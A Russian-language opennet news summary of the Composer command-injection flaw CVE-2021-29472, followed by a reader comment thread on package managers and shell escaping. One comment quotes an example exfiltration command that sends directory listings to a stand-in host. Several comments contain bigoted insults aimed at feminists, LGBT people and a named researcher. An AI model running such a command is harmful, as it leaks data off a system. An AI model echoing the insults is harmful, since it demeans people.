В менеджере зависимостей Composer выявлена критическая уязвимость (CVE-2021-29472), позволяющая выполнить произвольные команды в системе при обработке пакета со специально оформленным значением URL, определяющим адрес для загрузки исходных текстов. Проблема проявляется в компонентах GitDriver, SvnDriver и HgDriver, применяемых при использовании систем управления исходными текстами Git, Subversion и Mercurial. Уязвимость устранена в выпусках Composer 1.10.22 и 2.0.13...

Подробнее: https://www.opennet.dev/opennews/art.shtml?num=55065

• Уязвимость в пакетном менеджере Composer, допускающая компро...,Онаним, 09:24 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Онаним, 09:25 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 09:43 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Онаним, 09:52 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,Анто769ним, 10:17 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:17 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,Онаним, 13:47 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 09:44 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Онаним, 09:53 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,пох., 10:50 , 03-Май-21
      • Уязвимость в пакетном менеджере Composer, допускающая компро...,Dzen Python, 11:18 , 03-Май-21
      • Уязвимость в пакетном менеджере Composer, допускающая компро...,имя_, 12:10 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,Lex, 12:56 , 03-Май-21
      • Уязвимость в пакетном менеджере Composer, допускающая компро...,Онаним, 22:37 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:32 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,user90, 09:59 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Dzen Python, 11:13 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 10:35 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 10:58 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:11 , 03-Май-21
      • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:27 , 03-Май-21
        • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 12:34 , 03-Май-21
        • Уязвимость в пакетном менеджере Composer, допускающая компро...,Dzen Python, 12:41 , 03-Май-21
          • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 08:36 , 05-Май-21
          • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 09:18 , 05-Май-21
            • Уязвимость в пакетном менеджере Composer, допускающая компро...,Dzen Python, 14:38 , 06-Май-21
              • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 09:29 , 07-Май-21
                • Уязвимость в пакетном менеджере Composer, допускающая компро...,Dzen Python, 21:27 , 07-Май-21
        • Уязвимость в пакетном менеджере Composer, допускающая компро...,Онаним, 13:49 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,Dzen Python, 11:12 , 03-Май-21
      • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:38 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 10:54 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:09 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Анонин, 10:59 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:00 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:07 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:03 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Dzen Python, 11:07 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:16 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:28 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 11:44 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,anonymous, 14:45 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,hshhhhh, 12:23 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,YetAnotherOnanym, 12:38 , 03-Май-21
      • Уязвимость в пакетном менеджере Composer, допускающая компро...,пох., 12:42 , 03-Май-21
        • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 15:20 , 03-Май-21
        • Уязвимость в пакетном менеджере Composer, допускающая компро...,макпыф, 17:50 , 03-Май-21
          • Уязвимость в пакетном менеджере Composer, допускающая компро...,hshhhhh, 21:10 , 03-Май-21
            • Уязвимость в пакетном менеджере Composer, допускающая компро...,макпыф, 21:13 , 03-Май-21
          • Уязвимость в пакетном менеджере Composer, допускающая компро...,пох., 20:21 , 04-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,YetAnotherOnanym, 11:59 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 15:30 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Анин, 14:16 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Dzen Python, 16:16 , 03-Май-21
  • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 16:23 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 16:50 , 03-Май-21
      • Уязвимость в пакетном менеджере Composer, допускающая компро...,Анин, 20:37 , 03-Май-21
    • Уязвимость в пакетном менеджере Composer, допускающая компро...,Анин, 20:36 , 03-Май-21
• Уязвимость в пакетном менеджере Composer, допускающая компро...,Аноним, 21:34 , 10-Май-21

Это не баг, это фича.

(СtI/CtD = continous trojan integration / continuous trojan deployment)

> ежемесячно обслуживающий более 1.4 миллиарда загрузок

Кто все эти люди? Индусы и китайцы? И это какой-то реально полезный софт?

В основном это автоматические деплоеры, которым абсолютно пофиг, сколько там троянов внутри.

А деплоят они на локалхост, ага

Куча биллингов написано на php, у меня на работе, у мужа на прошлой работе, на новой crm. Все они используют композер.
Все используют композер если программируют на php, это тоже самое что maven для java.

"Все используют" - слишком распространённое заблуждение.

Картина Репина: похапешники и безопасность

Я бы сказал, девляпсы и безопасность.
Композер долго держался молодцом сравнительно со всякими npm.

При комм....pear такого не было.

Потому что было как-то немодно тянуть в рот любую какашку с шитхаба. Но для обезьянок это было слишком сложно и замороченно.

Ну щито поделать-то? Обезьянья культурка "поколения гитхаба" стала самоподдерживающейся.
При ней главное СоС нарисовать и перед всякими ущербными жирофемками и "до чего дошел прогресс - у Коляна ПМС" не отсвечивать. А вот на код и на проверку либ времени не остается. Вот и пихают в проекты все что не попадя, наудачу надеясь, что экзерсис VasyanKolyanLGBT666 будет хоть немного рабочим.

при пир такого не было, только потому что сам пир был полухдохлый

Так и с npm'ом все в порядке..
Для понимания разницы, уязвимость нашли не в конечном пакете которых горы, а в самом пакетном менеджере [для пыха]

C npm было ещё хуже, в нём package-manager-agnostic дырень проявилась.
Которая задела не только npm, а все недопакетные недоменеджеры по касательной.
Потому что сама платформа изначально делана кривыми ногами.

CVE-2019-16776
CVE-2019-16777

Сделай лучше, фуле!

PornDriver

PornHubDriver

Драйверы. На пхп.

Дело не в PHP Такой же баг был бы на любом языке. Дело в подходе вызывать зависимости через командную строку. Это всегда дыряво. Нельзя гарантированно заэкранировать всё. С SQL это поняли и перестали пытаться экранировать. В мире linux где всё состоит из отдельных консольных программ, которые вызывают друг друга через командную строку это распространённая практика, от которой ещё долго будут отвыкать. Так что увы. Подобные баги будут повторяться.

Гарантированно заэкранировать всё - можно. И надо-то для этого всего лишь руки не из задницы иметь.

Просто нужно чтобы программы писали анонимные эксперты с opennet, а не каким-то вебмакакам. Анонимные эксперты на то и эксперты что у них руки не из задницы ростут.

Ну мааам

Да не вопрос, чувак. У тебя есть деньги на то, чтобы писали именно анонимные эксперты с опеннета? Со всеми проверками, тестированием, без постоянных сроков "надо было еще вчера" и без очешуительных правок в самый последний момент? Что такое, что мордочку-то скривил?

За деньги я и сама могу.

То есть вы предлагаете оплатить исправление уже исправленой уязвимости, оплатить неизвестно кому, кто с 99.9% вероятностью ничего сложного на php не писал, при этом с бесконечными сроками?

И вообще, сколько комитов вы уже сделали в composer? Покажите их.

> Гарантированно заэкранировать всё - можно. И надо-то для этого всего лишь руки не из задницы иметь.
> Кудох-тох-тох, эти анонимные эксперты с опеннета

Ты так и не понял, к чему это было написано, горе-разраб...

> И вообще, сколько комитов вы уже сделали в composer? Покажите их.

Разраб композера, залогинься. Все равно у меня длиннее - не в коммитах, а в нормальных сантиметрах.

Надо понимать код ты пишешь не руками, а теми самыми сантиметрами которыми собрался меняться.

> Надо понимать код ты пишешь не руками, а теми самыми сантиметрами которыми
> собрался меняться.

Надо понимать, что ты не оставляешь надежды померяться коммитами?

Анонимные эксперты их собственно и пишут, просто в такие вот сводки обычно не попадают, потому что и область собственно распространения поуже "широкой макакопублики", и маразмов поменьше.

Альтернативы?
- Монолитный блоатварь, где все эти утилиты слеплены воедино? И страдать, если встроенный в код аналог grep'а нельзя заменить на ZZZgrep, умеющий фичу YYY, облегчающий в сценарии XXX работу, убирая много строк потенциально опасного шеллкода?
- RPC, который ломается точно так же?

Не вчитывался подробно и не знаю особенностей php, но насколько я понимаю нечто подобное этому
https://github.com/libgit2/php-git решило бы проблему.
php-git2 is a PHP bindings to the libgit2 linkable C Git library.

>> Аудит логов на серверах Packagist не выявил связанной с уязвимостью подозрительной активности.
>> Ошибка присутствует в коде с ноября 2011 года.

Прям с 2011 года весь аудит просмотрели?

Грепнули логи, делов то

Неуязвимых не бывает.

>> В менеджере зависимостей Composer выявлена критическая уязвимость, позволяющая выполнить произвольные команды в системе при обработке

пакета

npm postinstall:  Уязвимость? о_О Фух, показалось...

Даже например deb пакеты такое умеют.

Чето в голос.

Никогда такого не было и вот опять...

все эти composer, pip, npm для идиотов которые не знают что такое git submodules

лучше покажи мне дурачка который будет использовать git submodules вместо pip, таких даже среди клинических больных поискать придётся

Любой вменяемый даже если и использует всю эту дрянь, то только чтобы скачать и тут же закрепить в submodules

Возможно вам понравится Go. Ибо он тупо переиспользует git для удалённых зависимостей.

Все эти менеджеры зависимостей в линуксе для тех кто не осилил wget

И не осилил собственную графовую БД для зависимостей. Слабаки!

Лошье! Только бумага и карандаш! Никаких БД!
Все зависимости должны быть отрисованы вручную и подписаны экспертом!

Нужно создать единое министерство зависимостей. И ввести ответственность за выдачу заведомо ложных зависимостей.

я предпочитаю хранить все в голове

всё ещё на слакваре?

> всё ещё на слакваре?

lfs

А что, готишно... Свиток с графом зависимостей, аккуратно свешивающийся из стоящего на полке черепа... товарищмайор, возможно, не совсем одобряют охоту за головами, но, с другой стороны, много ведь и не надо. А этим, из "Сети", пару голов ведь простили и отпустили... это ж не грибы на погибель мировому империализму растить, а просто пара подвернувшихся под руку неудачников...

Я бы штук семь, пожалуй, собрал, для красивого числа.

> curl http://exfiltration-host.tld --data “$(ls -alh)

Ыыыы... какая прелесть!
> в тот же день проблема была исправлена

Одного меня настораживает такая скорость?

> Одного меня настораживает такая скорость?

Да.

Ребята из Миннесоты лютуют

Врешь. Это все Петров aka "Lovely_Bear" и Боширов aka "M$pwnER".

>Ребята из Миннесоты лютуют

... Шапитофф и Литрофф ?

Адитья Пакки вы только посмотрите на его честное, цветное, трансгендерное лицо https://adityapakki.github.io/ разве мог быть у него какой-то умысел? Он просто код писать не умеет просто он только на джаваскриат умел до коммита в ядро.

Петров переборщил с автозагаром

Они же Попа и Табаров они же...

>которые выполняются при помощи вызова "fromShellCommandline" с передачей аргументов командной строки.

Уж сколько раз твердили миру:

юзайте API || RPC || передавайте аргументы через конфиг-файл/трубу || реализуйте, еслине реализовано || GTFO.

Но there is a sucker born every minute, желающие и ведущиеся на лёгкие пути не мамонты и не вымрут никогда.